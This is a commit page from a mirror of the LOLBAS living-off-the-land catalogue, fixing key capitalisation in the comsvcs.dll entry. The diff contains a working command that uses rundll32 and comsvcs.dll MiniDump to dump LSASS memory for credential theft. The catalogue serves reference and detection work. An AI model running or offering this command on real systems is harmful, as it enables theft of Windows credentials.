public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-26 14:59:03 +01:00
Code Issues Projects Releases Wiki Activity

Adjusted case sensitive type in yml file for Comsvcs

Browse Source
This commit is contained in:
Oddvar Moe 2019-09-16 09:44:14 +02:00
parent 11c6c7c48d
commit 4ebf1ac4f7
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSLibraries/comsvcs.yml
View File

@ -6,11 +6,11 @@ Created: '2019-08-30'
Commands: Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump. Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
UseCase: Dump Lsass.exe process memory to retrieve credentials. Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump Category: Dump
Privileges: SYSTEM Privileges: SYSTEM
MitreID: T1003 MitreID: T1003
MItreLink: https://attack.mitre.org/wiki/Technique/T1003 MitreLink: https://attack.mitre.org/wiki/Technique/T1003
OperatingSystem: Windows OperatingSystem: Windows
Full_Path: Full_Path:
- Path: c:\windows\system32\comsvcs.dll - Path: c:\windows\system32\comsvcs.dll